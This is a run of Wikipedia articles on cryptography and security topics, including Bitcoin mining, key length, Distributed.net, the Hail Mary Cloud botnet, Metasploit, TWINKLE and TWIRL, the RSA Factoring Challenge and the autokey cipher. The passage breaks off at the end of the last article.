Nakamoto's key innovation. The mining process involves identifying a block that, when hashed twice withSHA-256, yields a number smaller than the given difficulty target. While the average work required increases in inverse proportion to the difficulty target, a hash can always be verified by executing a single round of double SHA-256. For the bitcoin timestamp network, a valid proof of work is found by incrementing anonceuntil a value is found that gives the block's hash the required number of leading zero bits. Once thehashinghas produced a valid result, the block cannot be changed without redoing the work. As later blocks are chained after it, the work to change the block would include redoing the work for each subsequent block. If there is a deviation in consensus then ablockchain forkcan occur. Majority consensus in bitcoin is represented by the longest chain, which required the greatest amount of effort to produce. If a majority of computing power is controlled by honest nodes, the honest chain will grow fastest and outpace any competing chains. To modify a past block, an attacker would have to redo the proof-of-work of that block and all blocks after it and then surpass the work of the honest nodes. The probability of a slower attacker catching up diminishes exponentially as subsequent blocks are added.[3] To compensate for increasing hardware speed and varying interest in running nodes over time, the difficulty of finding a valid hash is adjusted roughly every two weeks. If blocks are generated too quickly, the difficulty increases and more hashes are required to make a block and to generate new bitcoins.[3] Bitcoin mining is a competitive endeavor. An "arms race" has been observed through the various hashing technologies that have been used to mine bitcoins: basiccentral processing units(CPUs), high-endgraphics processing units(GPUs),field-programmable gate arrays(FPGAs) andapplication-specific integrated circuits(ASICs) all have been used, each reducing the profitability of the less-specialized technology. Bitcoin-specific ASICs are now the primary method of mining bitcoin and have surpassed GPU speed by as much as 300-fold. The difficulty of the mining process is periodically adjusted to the mining power active on the network. As bitcoins have become more difficult to mine, computer hardware manufacturing companies have seen an increase in sales of high-end ASIC products.[8] Computing power is often bundled together or "pooled" to reduce variance in miner income. Individual mining rigs often have to wait for long periods to confirm a block of transactions and receive payment. In a pool, all participating miners get paid every time a participating server solves a block. This payment depends on the amount of work an individual miner contributed to help find that block, and the payment system used by the pool.[9] By convention, the first transaction in a block is a special transaction that produces new bitcoins owned by the creator of the block. This is the incentive for nodes to support the network.[2]It provides a way to move new bitcoins into circulation. The reward for mining halves every 210,000 blocks. It started at 50 bitcoin, dropped to 25 in late 2012, and to 6.25 bitcoin in 2020. The most recent halving, which occurred on 20 April 2024 at 12:09am UTC (with block number 840,000), reduced the block reward to 3.125 bitcoins.[15][16]The next halving is expected to occur in 2028, when the block reward will fall to 1.625 bitcoins.[17][18]This halving process is programmed to continue a maximum of 64 times before new coin creation ceases.[19] Each miner can choose which transactions are included in or exempted from a block.[20]A greater number of transactions in a block does not equate to greater computational power required to solve that block.[20] As noted in Nakamoto's whitepaper, it is possible to verify bitcoin payments without running a full network node (simplified payment verification, SPV). A user only needs a copy of the block headers of the longest chain, which are available by querying network nodes until it is apparent that the longest chain has been obtained; then, get theMerkle treebranch linking the transaction to its block. Linking the transaction to a place in the chain demonstrates that a network node has accepted it, and blocks added after it further establish the confirmation.[2] Various potential attacks on the bitcoin network and its use as a payment system, real or theoretical, have been considered. The bitcoin protocol includes several features that protect it against some of those attacks, such as unauthorized spending, double spending, forging bitcoins, and tampering with the blockchain. Other attacks, such as theft of private keys, require due care by users.[21][22] Unauthorized spending is mitigated by bitcoin's implementation of public-private key cryptography. For example, when Alice sends a bitcoin to Bob, Bob becomes the new owner of the bitcoin. Eve, observing the transaction, might want to spend the bitcoin Bob just received, but she cannot sign the transaction without the knowledge of Bob's private key.[22] A specific problem that an internet payment system must solve isdouble-spending, whereby a user pays the same coin to two or more different recipients. An example of such a problem would be if Eve sent a bitcoin to Alice and later sent the same bitcoin to Bob. The bitcoin network guards against double-spending by recording all bitcoin transfers in a ledger (the blockchain) that is visible to all users, and ensuring for all transferred bitcoins that they have not been previously spent.[22]: 4 If Eve offers to pay Alice a bitcoin in exchange for goods and signs a corresponding transaction, it is still possible that she also creates a different transaction at the same time sending the same bitcoin to Bob. By the rules, the network accepts only one of the transactions. This is called arace attack, since there is a race between the recipients to accept the transaction first. Alice can reduce the risk of race attack stipulating that she will not deliver the goods until Eve's payment to Alice appears in the blockchain.[23] A variant race attack (which has been called a Finney attack by reference to Hal Finney) requires the participation of a miner. Instead of sending both payment requests (to pay Bob and Alice with the same coins) to the network, Eve issues only Alice's payment request to the network, while the accomplice tries to mine a block that includes the payment to Bob instead of Alice. There is a positive probability that the rogue miner will succeed before the network, in which case the payment to Alice will be rejected. As with the plain race attack, Alice can reduce the risk of a Finney attack by waiting for the payment to be included in the blockchain.[24] Each block that is added to the blockchain, starting with the block containing a given transaction, is called a confirmation of that transaction. Ideally, merchants and services that receive payment in bitcoin should wait for at least a few confirmations to be distributed over the network before assuming that the payment was done. The more confirmations that the merchant waits for, the more difficult it is for an attacker to successfully reverse the transaction—unless the attacker controls more than half the total network power, in which case it is called a 51% attack, or a majority attack.[25]Although more difficult for attackers of a smaller size, there may be financial incentives that make history modification attacks profitable.[26] TheBitcoin scalability problemrefers to the limited capability of theBitcoinnetwork to handle large amounts of transaction data on its platform in a short span of time.[27]It is related to the fact that records (known asblocks) in the Bitcoinblockchainare limited in size and frequency.[28] Deanonymisationis a strategy in data mining in which anonymous data is cross-referenced with other sources of data to re-identify the anonymous data source. Along with transaction graph analysis, which may reveal connections between bitcoin addresses (pseudonyms),[21][30]there is a possible attack[31]which links a user's pseudonym to itsIP address. If the peer is usingTor, the attack includes a method to separate the peer from the Tor network, forcing them to use their real IP address for any further transactions. The cost of the attack on the full bitcoin network was estimated to be under €1500 per month, as of 2014.[31]
https://en.wikipedia.org/wiki/Bitcoin_mining
Incryptography,key sizeorkey lengthrefers to the number ofbitsin akeyused by acryptographicalgorithm (such as acipher). Key length defines the upper-bound on an algorithm'ssecurity(i.e. a logarithmic measure of the fastest known attack against an algorithm), because the security of all algorithms can be violated bybrute-force attacks. Ideally, the lower-bound on an algorithm's security is by design equal to the key length (that is, the algorithm's design does not detract from the degree of security inherent in the key length). Mostsymmetric-key algorithmsare designed to have security equal to their key length. However, after design, a new attack might be discovered. For instance,Triple DESwas designed to have a 168-bit key, but an attack of complexity 2112is now known (i.e. Triple DES now only has 112 bits of security, and of the 168 bits in the key the attack has rendered 56 'ineffective' towards security). Nevertheless, as long as the security (understood as "the amount of effort it would take to gain access") is sufficient for a particular application, then it does not matter if key length and security coincide. This is important forasymmetric-key algorithms, because no such algorithm is known to satisfy this property;elliptic curve cryptographycomes the closest with an effective security of roughly half its key length. Keysare used to control the operation of a cipher so that only the correct key can convert encrypted text (ciphertext) toplaintext. All commonly-used ciphers are based on publicly knownalgorithmsor areopen sourceand so it is only the difficulty of obtaining the key that determines security of the system, provided that there is no analytic attack (i.e. a "structural weakness" in the algorithms or protocols used), and assuming that the key is not otherwise available (such as via theft, extortion, or compromise of computer systems). The widely accepted notion that the security of the system should depend on the key alone has been explicitly formulated byAuguste Kerckhoffs(in the 1880s) andClaude Shannon(in the 1940s); the statements are known asKerckhoffs' principleand Shannon's Maxim respectively. A key should, therefore, be large enough that a brute-force attack (possible against any encryption algorithm) is infeasible – i.e. would take too long and/or would take too much memory to execute.Shannon'swork oninformation theoryshowed that to achieve so-called 'perfect secrecy', the key length must be at least as large as the message and only used once (this algorithm is called theone-time pad). In light of this, and the practical difficulty of managing such long keys, modern cryptographic practice has discarded the notion of perfect secrecy as a requirement for encryption, and instead focuses oncomputational security, under which the computational requirements of breaking an encrypted text must be infeasible for an attacker. Encryption systems are often grouped into families. Common families include symmetric systems (e.g.AES) and asymmetric systems (e.g.RSAandElliptic-curve cryptography[ECC]). They may be grouped according to the centralalgorithmused (e.g.ECCandFeistel ciphers). Because each of these has a different level of cryptographic complexity, it is usual to have different key sizes for the samelevel of security, depending upon the algorithm used. For example, the security available with a 1024-bit key using asymmetricRSAis considered approximately equal in security to an 80-bit key in a symmetric algorithm.[1] The actual degree of security achieved over time varies, as more computational power and more powerful mathematical analytic methods become available. For this reason, cryptologists tend to look at indicators that an algorithm or key length shows signs of potential vulnerability, to move to longer key sizes or more difficult algorithms. For example, as of May 2007[update], a 1039-bit integer was factored with thespecial number field sieveusing 400 computers over 11 months.[2]The factored number was of a special form; the special number field sieve cannot be used on RSA keys. The computation is roughly equivalent to breaking a 700 bit RSA key. However, this might be an advance warning that 1024 bit RSA keys used in secure online commerce should bedeprecated, since they may become breakable in the foreseeable future. Cryptography professorArjen Lenstraobserved that "Last time, it took nine years for us to generalize from a special to a nonspecial, hard-to-factor number" and when asked whether 1024-bit RSA keys are dead, said: "The answer to that question is an unqualified yes."[3] The 2015Logjam attackrevealed additional dangers in using Diffie-Hellman key exchange when only one or a few common 1024-bit or smaller prime moduli are in use. This practice, somewhat common at the time, allows large amounts of communications to be compromised at the expense of attacking a small number of primes.[4][5] Even if a symmetric cipher is currently unbreakable by exploiting structural weaknesses in its algorithm, it may be possible to run through the entirespaceof keys in what is known as a brute-force attack. Because longer symmetric keys require exponentially more work to brute force search, a sufficiently long symmetric key makes this line of attack impractical. With a key of lengthnbits, there are 2npossible keys. This number grows very rapidly asnincreases. The large number of operations (2128) required to try all possible 128-bit keys is widely consideredout of reachfor conventional digital computing techniques for the foreseeable future.[6]However, aquantum computercapable of runningGrover's algorithmwould be able to search the possible keys more efficiently. If a suitably sized quantum computer would reduce a 128-bit key down to 64-bit security, roughly aDESequivalent. This is one of the reasons whyAESsupports key lengths of 256 bits and longer.[a] IBM'sLucifer cipherwas selected in 1974 as the base for what would become theData Encryption Standard. Lucifer's key length was reduced from 128 bits to56 bits, which theNSAand NIST argued was sufficient for non-governmental protection at the time. The NSA has major computing resources and a large budget; some cryptographers includingWhitfield DiffieandMartin Hellmancomplained that this made the cipher so weak that NSA computers would be able to break a DES key in a day through brute forceparallel computing. The NSA disputed this, claiming that brute-forcing DES would take them "something like 91 years".[7] However, by the late 90s, it became clear that DES could be cracked in a few days' time-frame with custom-built hardware such as could be purchased by a large corporation or government.[8][9]The bookCracking DES(O'Reilly and Associates) tells of the successful ability in 1998 to break 56-bit DES by a brute-force attack mounted by a cyber civil rights group with limited resources; seeEFF DES cracker. Even before that demonstration, 56 bits was considered insufficient length forsymmetric algorithmkeys for general use. Because of this, DES was replaced in most security applications byTriple DES, which has 112 bits of security when using 168-bit keys (triple key).[1] TheAdvanced Encryption Standardpublished in 2001 uses key sizes of 128, 192 or 256 bits. Many observers consider 128 bits sufficient for the foreseeable future for symmetric algorithms ofAES's quality untilquantum computersbecome available.[citation needed]However, as of 2015, the U.S.National Security Agencyhas issued guidance that it plans to switch to quantum computing resistant algorithms and now requires 256-bit AES keys for dataclassified up to Top Secret.[10] In 2003, the U.S. National Institute for Standards and Technology,NISTproposed phasing out 80-bit keys by 2015. At 2005, 80-bit keys were allowed only until 2010.[11] Since 2015, NIST guidance says that "the use of keys that provide less than 112 bits ofsecurity strengthfor key agreement is now disallowed." NIST approved symmetric encryption algorithms include three-keyTriple DES, andAES. Approvals for two-key Triple DES andSkipjackwere withdrawn in 2015; theNSA's Skipjack algorithm used in itsFortezzaprogram employs 80-bit keys.[1] The effectiveness ofpublic key cryptosystemsdepends on the intractability (computational and theoretical) of certain mathematical problems such asinteger factorization. These problems are time-consuming to solve, but usually faster than trying all possible keys by brute force. Thus,asymmetric keysmust be longer for equivalent resistance to attack than symmetric algorithm keys. The most common methods are assumed to be weak against sufficiently powerfulquantum computersin the future. Since 2015, NIST recommends a minimum of 2048-bit keys forRSA,[12]an update to the widely accepted recommendation of a 1024-bit minimum since at least 2002.[13] 1024-bit RSA keys are equivalent in strength to 80-bit symmetric keys, 2048-bit RSA keys to 112-bit symmetric keys, 3072-bit RSA keys to 128-bit symmetric keys, and 15360-bit RSA keys to 256-bit symmetric keys.[14]In 2003,RSA Securityclaimed that 1024-bit keys were likely to become crackable sometime between 2006 and 2010, while 2048-bit keys are sufficient until 2030.[15]As of 2020[update]the largest RSA key publicly known to be cracked isRSA-250with 829 bits.[16] The Finite FieldDiffie-Hellmanalgorithm has roughly the same key strength as RSA for the same key sizes. The work factor for breaking Diffie-Hellman is based on thediscrete logarithm problem, which is related to the integer factorization problem on which RSA's strength is based. Thus, a 2048-bit Diffie-Hellman key has about the same strength as a 2048-bit RSA key. Elliptic-curve cryptography(ECC) is an alternative set of asymmetric algorithms that is equivalently secure with shorter keys, requiring only approximately twice the bits as the equivalent symmetric algorithm. A 256-bitElliptic-curve Diffie–Hellman(ECDH) key has approximately the same safety factor as a 128-bitAESkey.[12]A message encrypted with an elliptic key algorithm using a 109-bit long key was broken in 2004.[17] TheNSApreviously recommended 256-bit ECC for protecting classified information up to the SECRET level, and 384-bit for TOP SECRET;[10]In 2015 it announced plans to transition to quantum-resistant algorithms by 2024, and until then recommends 384-bit for all classified information.[18] The two best known quantum computing attacks are based onShor's algorithmandGrover's algorithm. Of the two, Shor's offers the greater risk to current security systems. Derivatives of Shor's algorithm are widely conjectured to be effective against all mainstream public-key algorithms includingRSA,Diffie-Hellmanandelliptic curve cryptography. According to Professor GillesBrassard, an expert in quantum computing: "The time needed to factor an RSA integer is the same order as the time needed to use that same integer as modulus for a single RSA encryption. In other words, it takes no more time to break RSA on a quantum computer (up to a multiplicative constant) than to use it legitimately on a classical computer." The general consensus is that these public key algorithms are insecure at any key size if sufficiently large quantum computers capable of running Shor's algorithm become available. The implication of this attack is that all data encrypted using current standards based security systems such as the ubiquitousSSLused to protect e-commerce and Internet banking andSSHused to protect access to sensitive computing systems is at risk. Encrypted data protected using public-key algorithms can be archived and may be broken at a later time, commonly known as retroactive/retrospective decryption or "harvest now, decrypt later". Mainstream symmetric ciphers (such asAESorTwofish) and collision resistant hash functions (such asSHA) are widely conjectured to offer greater security against known quantum computing attacks. They are widely thought most vulnerable toGrover's algorithm. Bennett, Bernstein, Brassard, and Vazirani proved in 1996 that a brute-force key search on a quantum computer cannot be faster than roughly 2n/2invocations of the underlying cryptographic algorithm, compared with roughly 2nin the classical case.[19]Thus in the presence of large quantum computers ann-bit key can provide at leastn/2 bits of security. Quantum brute force is easily defeated by doubling the key length, which has little extra computational cost in ordinary use. This implies that at least a 256-bit symmetric key is required to achieve 128-bit security rating against a quantum computer. As mentioned above, the NSA announced in 2015 that it plans to transition to quantum-resistant algorithms.[10] In a 2016 Quantum Computing FAQ, the NSA affirmed: "A sufficiently large quantum computer, if built, would be capable of undermining all widely-deployed public key algorithms used for key establishment and digital signatures. [...] It is generally accepted that quantum computing techniques are much less effective against symmetric algorithms than against current widely used public key algorithms. While public key cryptography requires changes in the fundamental design to protect against a potential future quantum computer, symmetric key algorithms are believed to be secure provided a sufficiently large key size is used. [...] The public-key algorithms (RSA,Diffie-Hellman,[Elliptic-curve Diffie–Hellman] ECDH, and[Elliptic Curve Digital Signature Algorithm] ECDSA) are all vulnerable to attack by a sufficiently large quantum computer. [...] While a number of interesting quantum resistant public key algorithms have been proposed external to NSA, nothing has been standardized byNIST, and NSA is not specifying any commercial quantum resistant standards at this time. NSA expects that NIST will play a leading role in the effort to develop a widely accepted, standardized set of quantum resistant algorithms. [...] Given the level of interest in the cryptographic community, we hope that there will be quantum resistant algorithms widely available in the next decade. [...] The AES-256 and SHA-384 algorithms are symmetric, and believed to be safe from attack by a large quantum computer."[20] In a 2022 press release, the NSA notified: "A cryptanalytically-relevant quantum computer (CRQC) would have the potential to break public-key systems (sometimes referred to as asymmetric cryptography) that are used today. Given foreign pursuits in quantum computing, now is the time to plan, prepare and budget for a transition to [quantum-resistant] QR algorithms to assure sustained protection of [National Security Systems] NSS and related assets in the event a CRQC becomes an achievable reality."[21] Since September 2022, the NSA has been transitioning from theCommercial National Security Algorithm Suite(now referred to as CNSA 1.0), originally launched in January 2016, to the Commercial National Security Algorithm Suite 2.0 (CNSA 2.0), both summarized below:[22][b] CNSA 2.0 CNSA 1.0
https://en.wikipedia.org/wiki/Cryptographic_key_length
Distributed.netis avolunteer computingeffort that is attempting to solve large scale problems using otherwiseidle CPUorGPUtime. It is governed byDistributed Computing Technologies, Incorporated(DCTI), anon-profit organizationunder U.S. tax code501(c)(3). Distributed.net is working onRC5-72 (breaking RC5 with a 72-bit key).[1]The RC5-72 project is on pace to exhaust the keyspace in just under 37 years as of January 2025,[2]although the project will end whenever the required key is found. RC5 has eight unsolved challenges fromRSA Security, although in May 2007, RSA Security announced[3]that they would no longer be providing prize money for a correct key to any of their secret key challenges. distributed.net has decided to sponsor the original prize offer for finding the key as a result.[4] In 2001, distributed.net was estimated to have athroughputof over 30TFLOPS.[5]As of August 2019[update], the throughput was estimated to be the same as aCray XC40, as used in the Lonestar 5 supercomputer,[6]or around 1.25 petaFLOPs.[7] A coordinated effort was started in February 1997 byEarle AdyandChristopher G. Stach IIofHotjobs.comand New Media Labs, as an effort to break the RC5-56 portion of theRSA Secret-Key Challenge, a 56-bitencryptionalgorithm that had a $10,000USDprize available to anyone who could find thekey. Unfortunately, this initial effort had to be suspended as the result ofSYN floodattacks by participants upon the server.[8] A new independent effort, named distributed.net, was coordinated by Jeffrey A. Lawson, Adam L. Beberg, and David C. McNett along with several others who would serve on the board and operate infrastructure. By late March 1997 new proxies were released to resume RC5-56 and work began on enhanced clients. Acowhead was selected as the icon of the application and the project's mascot.[9] The RC5-56 challenge was solved on October 19, 1997, after 250 days. The correct key was "0x532B744CC20999" and the plaintext message read "The unknown message is: It's time to move to a longer key length".[10] The RC5-64 challenge was solved on July 14, 2002, after 1,757 days. The correct key was "0x63DE7DC154F4D039" and the plaintext message read "The unknown message is: Some things are better left unread".[10] The search forOptimal Golomb Rulers(OGRs) of order 24, 25, 26, 27 and 28 were completed by distributed.net on 13 October 2004, 25 October 2008, 24 February 2009, 19 February 2014, and 23 November 2022 respectively.[11][12][13][14][15] "DNETC" is the file name of the software application which users run to participate in any active distributed.net project. It is a command line program with an interface to configure it, available for a wide variety of platforms.[16]distributed.net refers to the software application simply as the "client". As of April 2019[update], volunteers running 32-bit Windows with AMD FireStream enabled GPUs have contributed the most processing power to the RC5-72 project[17]and volunteers running 64-bit Linux have contributed the most processing power to the OGR-28 project.[18] Portions of the source code for the client are publicly available, although users are not permitted to distribute modified versions themselves.[19] Distributed.net's RC5-72 project is available on theBOINCclient through theMoo! Wrapper.[20] In recent years, most of the work on the RC5-72 project has been submitted by clients that run on theGPUof moderngraphics cards. Although the project had already been underway for almost 6 years when the first GPUs began submitting results, as of January 2025, GPUs represent 88% of all completed work units,[22]and complete more than 95% of all work units each day.[21]
https://en.wikipedia.org/wiki/Distributed.net
TheHail Mary Cloudwas, or is, a password guessingbotnet, which used a statistical equivalent tobrute forcepasswordguessing. The botnet ran from possibly as early as 2005,[1]and certainly from 2007 until 2012 and possibly later. The botnet was named and documented by Peter N. M. Hansteen.[2] The principle is that a botnet can try several thousands of more likely passwords against thousands of hosts, rather than millions of passwords against one host. Since the attacks were widelydistributed, the frequency on a given server was low and was unlikely to trigger alarms.[2]Moreover, the attacks come from different members of the botnet, thus decreasing the effectiveness of bothIPbased detection and blocking.
https://en.wikipedia.org/wiki/Hail_Mary_Cloud
TheMetasploit Projectis acomputer securityproject that provides information aboutsecurity vulnerabilitiesand aids inpenetration testingandIDS signaturedevelopment. It is owned byBoston, Massachusetts-based security company,Rapid7. Its best-known sub-project is theopen-source[3]Metasploit Framework, a tool for developing and executingexploitcode against a remote target machine. Other important sub-projects include the Opcode Database,shellcodearchive and related research. The Metasploit Project includesanti-forensicand evasion tools, some of which are built into the Metasploit Framework. In various operating systems it comes pre installed. Metasploit was created byH. D. Moorein 2003 as a portable network tool usingPerl. By 2007, the Metasploit Framework had been completely rewritten inRuby. On October 21, 2009, the Metasploit Project announced[4]that it had been acquired by Rapid7, a security company that provides unified vulnerability management solutions. Like comparable commercial products such as Immunity's Canvas orCore Security Technologies' Core Impact, Metasploit can be used to test the vulnerability of computer systems or to break into remote systems. Like manyinformation securitytools, Metasploit can be used for both legitimate and unauthorized activities. Since the acquisition of the Metasploit Framework, Rapid7 has added anopen coreproprietary edition called Metasploit Pro.[5] Metasploit's emerging position as thede factoexploit development framework[6]led to the release of software vulnerability advisories often accompanied[7]by a third party Metasploit exploit module that highlights the exploitability, risk and remediation of that particular bug.[8][9]Metasploit 3.0 began to includefuzzingtools, used to discover software vulnerabilities, rather than just exploits for known bugs. This avenue can be seen with the integration of thelorconwireless (802.11) toolset into Metasploit 3.0 in November 2006. The basic steps for exploiting a system using the Framework include. This modular approach – allowing the combination of any exploit with any payload – is the major advantage of the Framework. It facilitates the tasks of attackers, exploit writers and payload writers. Metasploit runs on Unix (including Linux and macOS) and on Windows. The Metasploit Framework can be extended to use add-ons in multiple languages. To choose an exploit and payload, some information about the target system is needed, such as operating system version and installed network services. This information can be gleaned withport scanningandTCP/IP stack fingerprintingtools such asNmap.Vulnerability scannerssuch asNessus, andOpenVAScan detect target system vulnerabilities. Metasploit can import vulnerability scanner data and compare the identified vulnerabilities to existing exploit modules for accurate exploitation.[10] There are several interfaces for Metasploit available. The most popular are maintained by Rapid7 and Strategic Cyber LLC.[11] The Metasploit Framework is the freely available, open-source edition of the Metasploit Project. It provides tools for vulnerability assessment and exploit development including: The Metasploit Framework is implemented in Ruby and uses a modular software architecture.[12] In October 2010, Rapid7 added Metasploit Pro, an open-core commercial Metasploit edition for penetration testers. Metasploit Pro adds onto Metasploit Express with features such as Quick Start Wizards/MetaModules, building and managingsocial engineeringcampaigns, web application testing, an advanced Pro Console, dynamic payloads for anti-virus evasion, integration with Nexpose for ad-hoc vulnerability scans, and VPN pivoting. The edition was released in October 2011, and included a free, web-based user interface for Metasploit. Metasploit Community Edition was based on the commercial functionality of the paid-for editions with a reduced set of features, including network discovery, module browsing and manual exploitation. Metasploit Community was included in the main installer. On July 18, 2019, Rapid7 announced the end-of-sale of Metasploit Community Edition.[13]Existing users were able to continue using it until their license expired. The edition was released in April 2010, and was an open-core commercial edition for security teams who need to verify vulnerabilities. It offers a graphical user interface, It integrated nmap for discovery, and added smart brute-forcing as well as automated evidence collection. On June 4, 2019, Rapid7 discontinued Metasploit Express Edition.[14] Armitageis a graphical cyber attack management tool for the Metasploit Project that visualizes targets and recommends exploits. It is afree and open sourcenetwork securitytool notable for its contributions tored teamcollaboration allowing for shared sessions, data, and communication through a single Metasploit instance.[15] The latest release of Armitage was in 2015. Cobalt Strike is a collection of threat emulation tools provided by HelpSystems to work with the Metasploit Framework.[16]Cobalt Strike includes all features ofArmitageand adds post-exploitation tools, in addition to report generation features.[17] Metasploit currently has over 2074 exploits, organized under the following platforms:AIX,Android,BSD,BSDi,Cisco,Firefox,FreeBSD,HP-UX,Irix,Java,JavaScript,Linux,mainframe, multi (applicable to multiple platforms),NetBSD,NetWare,NodeJS,OpenBSD,macOS,PHP,Python,R,Ruby,Solaris,Unix, andWindows. Note thatApple iOSis based on FreeBSD, and some FreeBSD exploits may work, while most won't. Metasploit currently has over 592 payloads. Some of them are: The Metasploit Framework includes hundreds of auxiliary modules that can perform scanning, fuzzing, sniffing, and much more. There are three types of auxiliary modules namely scanners, admin and server modules. Metasploit Framework operates as an open-source project and accepts contributions from the community through GitHub.com pull requests.[18]Submissions are reviewed by a team consisting of both Rapid7 employees and senior external contributors. The majority of contributions add new modules, such as exploits or scanners.[19] List of original developers:
https://en.wikipedia.org/wiki/Metasploit_Project
TWINKLE(TheWeizmann InstituteKey Locating Engine) is a hypotheticalinteger factorizationdevice described in 1999 byAdi Shamir[1]and purported to be capable of factoring 512-bit integers.[2]It is also a pun on the twinklingLEDsused in the device. Shamir estimated that the cost of TWINKLE could be as low as $5000 per unit with bulk production. TWINKLE has a successor namedTWIRL[3]which is more efficient. The goal of TWINKLE is to implement the sieving step of theNumber Field Sievealgorithm, which is the fastest known algorithm for factoring large integers. The sieving step, at least for 512-bit and larger integers, is the most time consuming step of NFS. It involves testing a large set of numbers for B-'smoothness', i.e., absence of aprime factorgreater than a specified bound B. What is remarkable about TWINKLE is that it is not a purely digital device. It gets its efficiency by eschewingbinary arithmeticfor an "optical" adder which can add hundreds of thousands of quantities in a single clock cycle. The key idea used is "time-space inversion". Conventional NFS sieving is carried out one prime at a time. For each prime, all the numbers to be tested for smoothness in the range under consideration which are divisible by that prime have their counter incremented by thelogarithmof the prime (similar to thesieve of Eratosthenes). TWINKLE, on the other hand, works one candidate smooth number (call it X) at a time. There is one LED corresponding to each prime smaller than B. At the time instant corresponding to X, the set of LEDs glowing corresponds to the set of primes that divide X. This can be accomplished by having the LED associated with the primepglow once everyptime instants. Further, the intensity of each LED is proportional to the logarithm of the corresponding prime. Thus, the total intensity equals the sum of the logarithms of all the prime factors of X smaller than B. This intensity is equal to the logarithm of X if and only if X is B-smooth. Even in PC-based implementations, it's a common optimization to speed up sieving by adding approximate logarithms of small primes together. Similarly, TWINKLE has much room for error in its light measurements; as long as the intensity is at about the right level, the number is very likely to be smooth enough for the purposes of known factoring algorithms. The existence of even one large factor would imply that the logarithm of a large number is missing, resulting in a very low intensity; because most numbers have this property, the device's output would tend to consist of stretches of low intensity output with brief bursts of high intensity output. In the above it is assumed that X is square-free, i.e. it is not divisible by the square of any prime. This is acceptable since the factoring algorithms only require "sufficiently many" smooth numbers, and the "yield" decreases only by a small constant factor due to thesquare-freenessassumption. There is also the problem of false positives due to the inaccuracy of the optoelectronic hardware, but this is easily solved by adding a PC-based post-processing step for verifying the smoothness of the numbers identified by TWINKLE.
https://en.wikipedia.org/wiki/TWINKLE
Incryptographyandnumber theory,TWIRL(TheWeizmann InstituteRelation Locator) is a hypothetical hardware device designed to speed up the sieving step of thegeneral number field sieveinteger factorizationalgorithm.[1]During the sieving step, the algorithm searches for numbers with a certain mathematical relationship. In distributed factoring projects, this is the step that is parallelized to a large number of processors. TWIRL is still a hypothetical device — no implementation has been publicly reported. However, its designers,Adi ShamirandEran Tromer, estimate that if TWIRL were built, it would be able to factor 1024-bit numbers in one year at the cost of "a few dozen millionUS dollars". TWIRL could therefore have enormous repercussions incryptographyandcomputer security— many high-security systems still use 1024-bitRSAkeys, which TWIRL would be able to break in a reasonable amount of time and for reasonable costs. The security of some important cryptographic algorithms, notablyRSAand theBlum Blum Shubpseudorandom number generator, rests in the difficulty of factorizing large integers. If factorizing large integers becomes easier, users of these algorithms will have to resort to using larger keys (computationally more expensive) or to using different algorithms, whose security rests on some other computationally hard problem (like thediscrete logarithmproblem).
https://en.wikipedia.org/wiki/TWIRL
TheRSA Factoring Challengewas a challenge put forward byRSA Laboratorieson March 18, 1991[1]to encourage research intocomputational number theoryand the practical difficulty offactoringlargeintegersand crackingRSAkeys used incryptography. They published a list ofsemiprimes(numbers with exactly twoprime factors) known as theRSA numbers, with a cash prize for the successful factorization of some of them. The smallest of them, a 100-decimal digit number calledRSA-100was factored by April 1, 1991. Many of the bigger numbers have still not been factored and are expected to remain unfactored for quite some time, however advances inquantum computersmake this prediction uncertain due toShor's algorithm. In 2001, RSA Laboratories expanded the factoring challenge and offered prizes ranging from $10,000 to $200,000 for factoring numbers from 576 bits up to 2048 bits.[2][3][4] The RSA Factoring Challenges ended in 2007.[5]RSA Laboratories stated: "Now that the industry has a considerably more advanced understanding of the cryptanalytic strength of commonsymmetric-keyandpublic-key algorithms, these challenges are no longer active."[6]When the challenge ended in 2007, only RSA-576 and RSA-640 had been factored from the 2001 challenge numbers.[7] The factoring challenge was intended to track the cutting edge ininteger factorization. A primary application is for choosing thekey lengthof theRSApublic-key encryptionscheme. Progress in this challenge should give an insight into whichkey sizesare still safe and for how long. As RSA Laboratories is a provider of RSA-based products, the challenge was used by them as an incentive for the academic community to attack the core of their solutions — in order to prove its strength. The RSA numbers were generated on a computer with no network connection of any kind. The computer's hard drive was subsequently destroyed so that no record would exist, anywhere, of the solution to the factoring challenge.[6] The first RSA numbers generated, RSA-100 to RSA-500 and RSA-617, were labeled according to their number ofdecimaldigits; the other RSA numbers (beginning with RSA-576) were generated later and labelled according to their number ofbinarydigits. The numbers in the table below are listed in increasing order despite this shift from decimal to binary. RSA Laboratories states that: for each RSA numbern, there existprime numberspandqsuch that The problem is to find these two primes, given onlyn. The following table gives an overview over all RSA numbers. Note that the RSA Factoring Challenge ended in 2007[5]and no further prizes will be awarded for factoring the higher numbers.
https://en.wikipedia.org/wiki/RSA_Factoring_Challenge
Anautokey cipher(also known as theautoclave cipher) is acipherthat incorporates the message (theplaintext) into thekey. The key is generated from the message in some automated fashion, sometimes by selecting certain letters from the text or, more commonly, by adding a shortprimer keyto the front of the message. There are two forms of autokey cipher:key-autokeyandtext-autokeyciphers. A key-autokey cipher uses previous members of thekeystreamto determine the next element in the keystream. A text-autokey uses the previous message text to determine the next element in the keystream. This cipher was invented in 1586 byBlaise de Vigenèrewith a reciprocal table of ten alphabets. Vigenère's version used an agreed-upon letter of the alphabet as a primer, making the key by writing down that letter and then the rest of the message.[1] More popular autokeys use atabula recta, a square with 26 copies of the alphabet, the first line starting with 'A', the next line starting with 'B' etc. Instead of a single letter, a short agreed-upon keyword is used, and the key is generated by writing down the primer and then the rest of the message, as in Vigenère's version. To encrypt a plaintext, the row with the first letter of the message and the column with the first letter of the key are located. The letter in which the row and the column cross is the ciphertext letter. The autokey cipher, as used by members of theAmerican Cryptogram Association, starts with a relatively-short keyword, theprimer, and appends the message to it. For example, if the keyword isQUEENLYand the message isattack at dawn, then the key would beQUEENLYATTACKATDAWN.[2] The ciphertext message would thus be "QNXEPVYTWTWP". To decrypt the message, the recipient would start by writing down the agreed-upon keyword. The first letter of the key, Q, would then be taken, and that row would be found in a tabula recta. That column for the first letter of the ciphertext would be looked across, also Q in this case, and the letter to the top would be retrieved, A. Now, that letter would be added to the end of the key: Then, since the next letter in the key is U and the next letter in the ciphertext is N, the U row is looked across to find the N to retrieve T: That continues until the entire key is reconstructed, when the primer can be removed from the start. With Vigenère's autokey cipher, a single mistake in encryption renders the rest of the message unintelligible.[3] Autokey ciphers are somewhat more secure than polyalphabetic ciphers that use fixed keys since the key does not repeat within a single message. Therefore, methods like theKasiski examinationorindex of coincidenceanalysis will not work on the ciphertext, unlike for similar ciphers that use a single repeated key.[3] A 